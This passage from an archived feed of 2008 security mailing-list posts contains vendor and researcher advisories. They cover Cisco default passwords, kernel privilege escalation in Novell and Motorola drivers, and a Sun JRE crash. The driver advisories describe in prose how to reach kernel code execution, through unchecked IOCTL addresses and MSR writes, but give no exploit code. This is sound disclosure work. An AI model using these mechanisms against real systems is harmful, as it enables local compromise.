&lt;br&gt;&lt;br&gt;&amp;nbsp;8. Re-register the node from the Management Console for which the
&lt;br&gt;&amp;nbsp; &amp;nbsp; Condenser password was changed.
&lt;br&gt;&lt;br&gt;Obtaining Fixed Software
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;Cisco has released software updates that address this vulnerability.
&lt;br&gt;Prior to deploying software, customers should consult their maintenance
&lt;br&gt;provider or check the software for feature set compatibility and known
&lt;br&gt;issues specific to their environment.
&lt;br&gt;&lt;br&gt;Customers may only install and expect support for the feature
&lt;br&gt;sets they have purchased. By installing, downloading, accessing
&lt;br&gt;or otherwise using such software upgrades, customers agree to be
&lt;br&gt;bound by the terms of Cisco's software license terms found at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&lt;/a&gt;,
&lt;br&gt;or as otherwise set forth at Cisco.com Downloads at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Do not contact &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;psirt@...&lt;/a&gt; or &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt; for software
&lt;br&gt;upgrades.
&lt;br&gt;&lt;br&gt;Customers with Service Contracts
&lt;br&gt;+-------------------------------
&lt;br&gt;&lt;br&gt;Customers with contracts should obtain upgraded software through their
&lt;br&gt;regular update channels. For most customers, this means that upgrades
&lt;br&gt;should be obtained through the Software Center on Cisco's worldwide
&lt;br&gt;website at &lt;a href=&quot;http://www.cisco.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Customers using Third Party Support Organizations
&lt;br&gt;+------------------------------------------------
&lt;br&gt;&lt;br&gt;Customers whose Cisco products are provided or maintained through prior
&lt;br&gt;or existing agreements with third-party support organizations, such
&lt;br&gt;as Cisco Partners, authorized resellers, or service providers should
&lt;br&gt;contact that support organization for guidance and assistance with the
&lt;br&gt;appropriate course of action in regards to this advisory.
&lt;br&gt;&lt;br&gt;The effectiveness of any workaround or fix is dependent on specific
&lt;br&gt;customer situations, such as product mix, network topology, traffic
&lt;br&gt;behavior, and organizational mission. Due to the variety of affected
&lt;br&gt;products and releases, customers should consult with their service
&lt;br&gt;provider or support organization to ensure any applied workaround or fix
&lt;br&gt;is the most appropriate for use in the intended network before it is
&lt;br&gt;deployed.
&lt;br&gt;&lt;br&gt;Customers without Service Contracts
&lt;br&gt;+----------------------------------
&lt;br&gt;&lt;br&gt;Customers who purchase direct from Cisco but do not hold a Cisco service
&lt;br&gt;contract, and customers who purchase through third-party vendors but are
&lt;br&gt;unsuccessful in obtaining fixed software through their point of sale
&lt;br&gt;should acquire upgrades by contacting the Cisco Technical Assistance
&lt;br&gt;Center (TAC). TAC contacts are as follows.
&lt;br&gt;&lt;br&gt;&amp;nbsp; * +1 800 553 2447 (toll free from within North America)
&lt;br&gt;&amp;nbsp; * +1 408 526 7209 (toll call from anywhere in the world)
&lt;br&gt;&amp;nbsp; * e-mail: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;tac@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Customers should have their product serial number available and be
&lt;br&gt;prepared to give the URL of this notice as evidence of entitlement to a
&lt;br&gt;free upgrade. Free upgrades for non-contract customers must be requested
&lt;br&gt;through the TAC.
&lt;br&gt;&lt;br&gt;Refer to &lt;a href=&quot;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&lt;/a&gt;&lt;br&gt;for additional TAC contact information, including localized telephone
&lt;br&gt;numbers, and instructions and e-mail addresses for use in various
&lt;br&gt;languages.
&lt;br&gt;&lt;br&gt;Exploitation and Public Announcements
&lt;br&gt;=====================================
&lt;br&gt;&lt;br&gt;The Cisco PSIRT is not aware of any public announcements or malicious
&lt;br&gt;use of the vulnerability described in this advisory.
&lt;br&gt;&lt;br&gt;This vulnerability was identified through internal testing.
&lt;br&gt;&lt;br&gt;Status of this Notice: Final
&lt;br&gt;============================
&lt;br&gt;&lt;br&gt;THIS DOCUMENT IS PROVIDED ON AN &amp;quot;AS IS&amp;quot; BASIS AND DOES NOT IMPLY
&lt;br&gt;ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
&lt;br&gt;MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
&lt;br&gt;INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
&lt;br&gt;AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
&lt;br&gt;DOCUMENT AT ANY TIME.
&lt;br&gt;&lt;br&gt;A stand-alone copy or Paraphrase of the text of this document that omits
&lt;br&gt;the distribution URL in the following section is an uncontrolled copy,
&lt;br&gt;and may lack important information or contain factual errors.
&lt;br&gt;&lt;br&gt;Distribution
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;This advisory is posted on Cisco's worldwide website at :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;In addition to worldwide web posting, a text version of this notice is
&lt;br&gt;clear-signed with the Cisco PSIRT PGP key and is posted to the following
&lt;br&gt;e-mail and Usenet news recipients.
&lt;br&gt;&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cust-security-announce@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;first-teams@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=6&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;vulnwatch@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=7&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=8&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco-nsp@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=9&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; * &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15050308&amp;i=10&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;comp.dcom.sys.cisco@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;Future updates of this advisory, if any, will be placed on Cisco's
&lt;br&gt;worldwide website, but may or may not be actively announced on mailing
&lt;br&gt;lists or newsgroups. Users concerned about this problem are encouraged
&lt;br&gt;to check the above URL for any updates.
&lt;br&gt;&lt;br&gt;Revision History
&lt;br&gt;================
&lt;br&gt;&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;| Revision 1.0 &amp;nbsp;| 2008-January-23 &amp;nbsp;| Initial public release &amp;nbsp; |
&lt;br&gt;+-------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Procedures
&lt;br&gt;=========================
&lt;br&gt;&lt;br&gt;Complete information on reporting security vulnerabilities
&lt;br&gt;in Cisco products, obtaining assistance with security
&lt;br&gt;incidents, and registering to receive security information
&lt;br&gt;from Cisco, is available on Cisco's worldwide website at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&lt;/a&gt;.
&lt;br&gt;This includes instructions for press inquiries regarding
&lt;br&gt;Cisco security notices. All Cisco security advisories are available at
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;+----------------------------------------------------------------------
&lt;br&gt;All contents are Copyright (C) 2006-2008 Cisco Systems, Inc. All rights
&lt;br&gt;reserved.
&lt;br&gt;+----------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Updated: Jan 21, 2008 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Document ID: 100212
&lt;br&gt;&lt;br&gt;+----------------------------------------------------------------------
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.6 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iD8DBQFHl3j486n/Gc8U/uARArPpAJwJaihdYFR6B+ljPNEYLq6nCfluxgCbB85h
&lt;br&gt;UYvka5159PAAagGuJDiS10E=
&lt;br&gt;=PnnY
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Cisco-Security-Advisory%3A-Default-Passwords-in-the-Application-Velocity-System-tp15050308p15050308.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14744168</id>
	<title>iDefense Security Advisory 01.09.08: Novell NetWare Client nicm.sys Local Privilege Escalation Vulnerability</title>
	<published>2008-01-09T13:06:53Z</published>
	<updated>2008-01-09T13:06:53Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 01.09.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Jan 09, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;The Novell Client software provides a workstation with access to Novell
&lt;br&gt;NetWare networks as well as Novell Open Enterprise Server (OES)
&lt;br&gt;services. Novell Clients can access the full range of Novell services
&lt;br&gt;such as authentication via Novell eDirectory, network browsing and
&lt;br&gt;service resolution, and secure and reliable file system access. More
&lt;br&gt;information about the Novel Client can be found on the vendor's web
&lt;br&gt;site at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.novell.com/products/clients/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.novell.com/products/clients/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of an input validation error vulnerability within
&lt;br&gt;Novell Inc.'s NetWare Client allows attackers to execute arbitrary code
&lt;br&gt;within the kernel.
&lt;br&gt;&lt;br&gt;When the Novell NetWare Client is installed on a Windows-based operating
&lt;br&gt;system, the driver nicm.sys will be loaded at system startup. This
&lt;br&gt;driver allows any user to open the device &amp;quot;\\.\nicm&amp;quot; and issue IOCTLs
&lt;br&gt;with a buffering mode of METHOD_NEITHER.
&lt;br&gt;&lt;br&gt;Due to insufficient input validation, user mode software can pass kernel
&lt;br&gt;addresses as arguments to the driver. By using specially constructed
&lt;br&gt;input, a malicious user can use functionality within the driver to
&lt;br&gt;patch kernel addresses and execute arbitrary code in kernel mode.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability allows a local attacker to execute
&lt;br&gt;arbitrary code within the kernel. To exploit the vulnerability, the
&lt;br&gt;attacker must be able execute a specially crafted executable on the
&lt;br&gt;targeted computer.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in nicm.sys,
&lt;br&gt;file version 3.0.0.4, as included with Novell's NetWare Client 4.91
&lt;br&gt;SP4. Other versions may also be vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;iDefense is currently unaware of any workaround for this issue.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Novell Inc. has addressed this vulnerability by releasing a patch for
&lt;br&gt;the NetWare Client SP3. For more information visit the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://download.novell.com/Download?buildid=4FmI89wOmg4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://download.novell.com/Download?buildid=4FmI89wOmg4&lt;/a&gt;~
&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-5762 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;10/30/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;11/13/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;01/09/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was reported to iDefense by Stephen Fewer of Harmony
&lt;br&gt;Security (www.harmonysecurity.com)
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14744168&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-01.09.08%3A-Novell-NetWare-Client-nicm.sys-Local-Privilege-Escalation-Vulnerability-tp14744168p14744168.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14740696</id>
	<title>Corsaire Security Advisory: Sun J2RE DoS issue</title>
	<published>2008-01-08T04:36:32Z</published>
	<updated>2008-01-08T04:36:32Z</updated>
	<author>
		<name>advisories-2</name>
	</author>
	<content type="html">&lt;br&gt;-- Corsaire Security Advisory --
&lt;br&gt;&lt;br&gt;Title: Sun J2RE DoS issue
&lt;br&gt;Date: 05.09.06
&lt;br&gt;Application: Sun JRE 5.0 prior to update 14
&lt;br&gt;Environment: Sun JRE
&lt;br&gt;Author: Martin O'Neal [&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14740696&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;martin.oneal@...&lt;/a&gt;]
&lt;br&gt;Audience: General distribution
&lt;br&gt;Reference: c060905-002
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Scope --
&lt;br&gt;&lt;br&gt;The aim of this document is to clearly define an issue that exists with 
&lt;br&gt;the Sun JRE product [1] that will allow an attacker to cause the JRE and 
&lt;br&gt;Internet Explorer to fail, possibly losing unsaved work etc.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- History --
&lt;br&gt;&lt;br&gt;Discovered: 05.09.06 (Martin O'Neal)
&lt;br&gt;Vendor notified: 09.11.06
&lt;br&gt;Additional analysis: (Kevin O'Reilly)
&lt;br&gt;Document released: 08.01.08
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Overview --
&lt;br&gt;&lt;br&gt;Sun JRE is described [1] as &amp;quot;the Java APIs, Java Virtual Machine 
&lt;br&gt;(HotSpot VM), and other components necessary to run applets and 
&lt;br&gt;applications written in the Java programming language&amp;quot;.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;The software provides a virtualisation layer that allows java 
&lt;br&gt;applications to be run across platforms and operating systems. &amp;nbsp;These 
&lt;br&gt;java applications can be delivered to the JVM via a number of 
&lt;br&gt;mechanisms, and are commonly downloaded from a web server or less 
&lt;br&gt;commonly, can be embedded within HTML content.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Analysis --
&lt;br&gt;&lt;br&gt;The RFC2397 [2] standard allows for the encoding of java applets within 
&lt;br&gt;a URI, allowing it to be embedded in an HTML document. &amp;nbsp;
&lt;br&gt;&lt;br&gt;If an applet is encoded into the data parameter of an object tag with an 
&lt;br&gt;undefined &amp;quot;name&amp;quot; attribute, and is then passed to Internet Explorer, 
&lt;br&gt;then when the application is unencoded and passed in turn to the JVM it 
&lt;br&gt;causes a null pointer exception to occur in jpiexp32.dll. 
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Recommendations --
&lt;br&gt;&lt;br&gt;Upgrade to a version of the Sun JRE product that does not exhibit this 
&lt;br&gt;issue (such as Sun JRE 6.0 or JRE 5.0 update 14), and uninstall all 
&lt;br&gt;effected versions. &amp;nbsp;This is important, as it is possible for an attacker 
&lt;br&gt;to specify which local VM will be used to run an applet (and so select a 
&lt;br&gt;vulnerable version).
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- CVE --
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the 
&lt;br&gt;name CVE-2007-0012 to this issue. &amp;nbsp;This is a candidate for inclusion in 
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org&lt;/a&gt;), which standardises names for 
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- References --
&lt;br&gt;&lt;br&gt;[1] &lt;a href=&quot;http://java.sun.com/javase/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://java.sun.com/javase/&lt;/a&gt;&lt;br&gt;[2] &lt;a href=&quot;http://www.ietf.org/rfc/rfc2397&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.ietf.org/rfc/rfc2397&lt;/a&gt;&lt;br&gt;&lt;br&gt;This bug is tracked by Sun as 6511363.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Revision --
&lt;br&gt;&lt;br&gt;a. Initial release.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Distribution --
&lt;br&gt;&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot; with 
&lt;br&gt;no warranties or guarantees of fitness of use or otherwise. Corsaire 
&lt;br&gt;accepts no responsibility for any damage caused by the use or misuse of 
&lt;br&gt;this information.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- Disclaimer --
&lt;br&gt;&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot; with 
&lt;br&gt;no warranties or guarantees of fitness of use or otherwise. Corsaire 
&lt;br&gt;accepts no responsibility for any damage caused by the use or misuse of 
&lt;br&gt;this information.
&lt;br&gt;&lt;br&gt;&lt;br&gt;-- About Corsaire --
&lt;br&gt;&lt;br&gt;Corsaire are a leading information security consultancy, founded in 1997 
&lt;br&gt;in Guildford, Surrey, UK. Corsaire bring innovation, integrity and 
&lt;br&gt;analytical rigour to every job, which means fast and dramatic security 
&lt;br&gt;performance improvements. Our services centre on the delivery of 
&lt;br&gt;information security planning, assessment, implementation, management 
&lt;br&gt;and vulnerability research. 
&lt;br&gt;&lt;br&gt;A free guide to selecting a security assessment supplier is available at 
&lt;br&gt;&lt;a href=&quot;http://www.penetration-testing.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.penetration-testing.com&lt;/a&gt;&amp;nbsp;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Copyright 2006 Corsaire Limited. All rights reserved. 
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Corsaire-Security-Advisory%3A-Sun-J2RE-DoS-issue-tp14740696p14740696.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14681918</id>
	<title>iDefense Security Advisory 01.07.08: Motorola netOctopus Agent MSR Write Privilege Escalation Vulnerability</title>
	<published>2008-01-07T13:09:53Z</published>
	<updated>2008-01-07T13:09:53Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 01.07.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Jan 07, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Motorola netOctopus is an asset management agent. It is used to deploy
&lt;br&gt;software, monitor performance, and configure client machines from a
&lt;br&gt;central administrative console. More information can be found on the
&lt;br&gt;vendor's site at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.netopia.com/software/products/netoctopus/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.netopia.com/software/products/netoctopus/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of a privilege escalation vulnerability in Motorola
&lt;br&gt;Inc.'s netOctopus could allow an attacker to execute arbitrary code in
&lt;br&gt;kernel context.
&lt;br&gt;&lt;br&gt;The netOctopus Agent software is supposed to be installed on all client
&lt;br&gt;machines. It includes a driver, nantsys.sys, that is loaded at system
&lt;br&gt;boot time. This driver exposes a device interface, \\.\NantSys, that is
&lt;br&gt;writable by all users.
&lt;br&gt;&lt;br&gt;This driver includes functionality for reading and writing arbitrary CPU
&lt;br&gt;Model Specific Registers (MSRs). Changing MSR values allows tuning of
&lt;br&gt;various low level CPU operations. By modifying SYSENTER_EIP_MSR, is is
&lt;br&gt;possible to execute arbitrary attacker supplied code in kernel context
&lt;br&gt;by executing a sysenter instruction.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability results in the execution of arbitrary
&lt;br&gt;code in kernel context. Unsuccessful attempts may result in a system
&lt;br&gt;crash. However, due to the nature of the vulnerability exploitation is
&lt;br&gt;extremely reliable.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in version
&lt;br&gt;5.0.0.115 of the nantsys.sys driver as included with netOctopus version
&lt;br&gt;5.1.2 build 1011. Previous versions may also be affected.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Remove write permissions for the Everyone group for the \\.\NantSys
&lt;br&gt;device. This can be accomplished by using a tool like WinObj. This will
&lt;br&gt;prevent regular users from writing to the device.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;To address this vulnerability, Motorola Inc. has made a script available
&lt;br&gt;to remove the affected driver from the system. For more information,
&lt;br&gt;consult their advisory at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.netopia.com/support/software/technotes/netoctopus/Removing_the_nantsys_Driver.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.netopia.com/support/software/technotes/netoctopus/Removing_the_nantsys_Driver.pdf&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.netopia.com/support/software/technotes/netoctopus/removeNantsys.vbs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.netopia.com/support/software/technotes/netoctopus/removeNantsys.vbs&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-5761 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;09/07/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;09/07/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;01/07/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was reported to iDefense by Stephen Fewer of Harmony
&lt;br&gt;Security (www.harmonysecurity.com).
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14681918&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-01.07.08%3A-Motorola-netOctopus-Agent-MSR-Write-Privilege-Escalation-Vulnerability-tp14681918p14681918.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14681584</id>
	<title>CORE-2007-1106: SynCE Remote Command Injection</title>
	<published>2008-01-07T11:36:11Z</published>
	<updated>2008-01-07T11:36:11Z</updated>
	<author>
		<name>Core Security Technologies Advisories</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Core Security Technologies – CoreLabs Advisory
